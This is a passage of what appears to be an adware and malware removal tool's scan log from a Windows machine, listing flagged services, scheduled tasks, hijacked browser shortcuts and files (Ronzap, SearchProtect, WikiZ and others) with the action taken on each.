    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cloudynights.com/page/index.html -> Not selected
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.cloudynights.com/page/index.html -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Bar : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Internet Explorer\Main | Search Bar : http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms} -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([X][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6} | DhcpNameServer : 10.254.240.200 10.254.240.201 ([][]) -> Not selected
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Not selected
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys -> Not selected
    [PUP|VT.not-a-virus:AdWare.Win64.Agent.lkv] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs : C:\ProgramData\Ronzap\S-la.dll [-] -> Replaced ()
    [PUP|VT.not-a-virus:AdWare.Win32.AdAgent.je] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs : C:\ProgramData\Ronzap\IndigoString.dll [-] -> Replaced ()

    ¤¤¤ Tasks : 7 ¤¤¤
    [PUP] %WINDIR%\Tasks\DriverUpdate Scan.job -- C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe (scheduled) -> Not selected
    [PUP] %WINDIR%\Tasks\DriverUpdate Startup.job -- C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe (-boot) -> Not selected
    [PUP] %WINDIR%\Tasks\PC SpeedUp Service Deactivator.job -- C:\Program Files (x86)\PC Speed Up\PCSUSD.exe (/dev0 /idle) -> Not selected
    [PUP] %WINDIR%\Tasks\System HealerPeriod.job -- C:\Program Files (x86)\SystemHealer\SystemHealer.exe (-scan) -> Not selected
    [PUP] %WINDIR%\Tasks\System HealerStartUp.job -- C:\Program Files (x86)\SystemHealer\SystemHealer.exe (-scan) -> Not selected
    [Suspicious.Path|VT.PUP.Optional.SearchProtect] \bvyvcvd -- C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe -> ERROR [490]
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] \Pritc -- C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe -> ERROR [490]

    ¤¤¤ Files : 42 ¤¤¤
    [PUP][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9AMW -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\K9AMW\backup6.bin -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9Tools -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\K9Tools\k9pcp\ASPStartupManagerErrorLog.txt -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\K9Tools\k9pcp -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\KuaiZip -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk [LNK@] C:\PROGRA~2\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Shortcut cleaned
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Uninstall Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\UNINST~1.EXE "/U:C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml" -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\NUIns -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\NUIns\NUIns.exe -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Roaming\QuickCleaner -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\QuickCleaner\QuickCleanerCSUS.exe -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\Apps\2.0\abril.InstallLog -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep\UserRepository.dat -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep\UserSettings.dat -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\rep -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect\STG -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\SearchProtect -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\SearchProtect\UI\rep\UIRepository.dat -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\UI\rep -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SearchProtect\UI -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\SlimWare Utilities Inc -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fc71cf2364972ee6_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fd09f93ff6aaeb29_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fd3f4b5e3ecf453f_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\fde8941c022477d4_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\ff0e02c0624bf295_0 -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index-dir\the-real-index -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Cache\index-dir -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Cache -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\cookies -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\cookies-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\file__0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\file__0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_cdncache-a.akamaihd.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_commons.wikimedia.org_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_commons.wikimedia.org_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_nps.pastaleads.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_nps.pastaleads.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.bestpriceninja.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.bestpriceninja.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.eshopcomp.com_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_pstatic.eshopcomp.com_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_q2u3z6t7.ssl.hwcdn.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_q2u3z6t7.ssl.hwcdn.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_v3x3b3b5.map2.ssl.hwcdn.net_0.localstorage-journal -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_wiki2.org_0.localstorage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage\https_wiki2.org_0.localstorage-journal -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WikiZ\Local Storage -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Web Data -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WikiZ\Web Data-journal -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4\1.0.0.0\user.config -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4\1.0.0.0 -> Deleted
    [PUP][Folder] C:\Users\Administrator\AppData\Local\WINTUNEPRO\WINTUNEPRO.exe_Url_qgsvgdpws442beyezdgboqd2avkpwqs4 -> Deleted
    [PUP][Folder] C:\ProgramData\CloudPrinter -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\CloudPrinter.dat -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\CloudPrinter.exe -> Deleted
    [PUP][File] C:\ProgramData\CloudPrinter\Config.xml -> Deleted
    [PUP][Folder] C:\ProgramData\Doubleings -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\ff.HP -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\ff.NT -> Deleted
    [PUP][File] C:\ProgramData\Doubleings\snp.sc -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\Config.json -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\set.exe -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\set.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.dll -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.Linq.dll -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\System.Data.SQLite.xml -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\X64\SQLite.Interop.dll -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler\X64 -> Deleted
    [PUP][File] C:\ProgramData\Logic Handler\X86\SQLite.Interop.dll -> Deleted
    [PUP][Folder] C:\ProgramData\Logic Handler\X86 -> Deleted
    [PUP][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://navsmart.info -> Shortcut cleaned
    [PUP][Folder] C:\ProgramData\Ronzap -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Alphazimair.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Bigtip.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\conf.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Config.xml -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\IndigoString.dll -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\md.xml -> Deleted
    [PUP][Folder] C:\ProgramData\Ronzap\ondemand -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Rankfan.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.d.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Ronzap.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Runnamtone.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\S-la.dll -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SailQuadtom.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SanTax.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\SanTax.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Single-Nix.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Softsing.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Softsing.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Superstring.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Techlight.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\TopSailflex.exe -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\TopSailflex.exe.config -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\uninstall.dat -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Volity.bin -> Deleted
    [PUP][File] C:\ProgramData\Ronzap\Zamdom.bin -> Deleted
    [PUP][Folder] C:\ProgramData\Ronzaps -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\ff.HP -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\ff.NT -> Deleted
    [PUP][File] C:\ProgramData\Ronzaps\snp.sc -> Deleted
    [PUP][File] C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$R8B187A.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns1C20.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns3E5C.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\kns5B1C.tmp -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\vnsp73E0.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\mpck -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\confibg.conf -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\mobilepcstarterkit_widgetb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\o_networkb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\unins000b.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\uninstallerb.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\mpck\wincom_6bYEb.exe -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\EULA.txt -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\bin\uninstall.pun -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main\bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\cfi.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\edk.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\pni.bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\SystemRepository.dat -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\Main\rep\trn.bin -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\Main -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect\bin -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\SearchProtect -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\bin -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\consent.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent\defaults.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\Consent -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-default.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-onclick.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Apply-Rollover.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-dia.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-uninstall.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg-with-logo.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgNotif.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgSettings.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgSettingsDS.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\bgUninstall.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnBlue.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnClose.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\btnSilver.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\button-bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox_checked.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\checkbox_def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\close-win-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\close-win-over-click.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\gray-bg.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-def-grey.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\hez.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\icon-win.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\info-icon.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\menu-rollover.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\menu-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button-def.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button-selected.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\radio-button2.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\Settings-icon.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\SP_DialogBG.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\text-field.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\v.png -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images\x.png -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\Images -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\DialogAPI.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\dialogUtils.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\json2.min.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs\main.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\libs -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection\protection.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\protection -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS\protectionDS.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\protectionDS -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings\settings.js -> Deleted
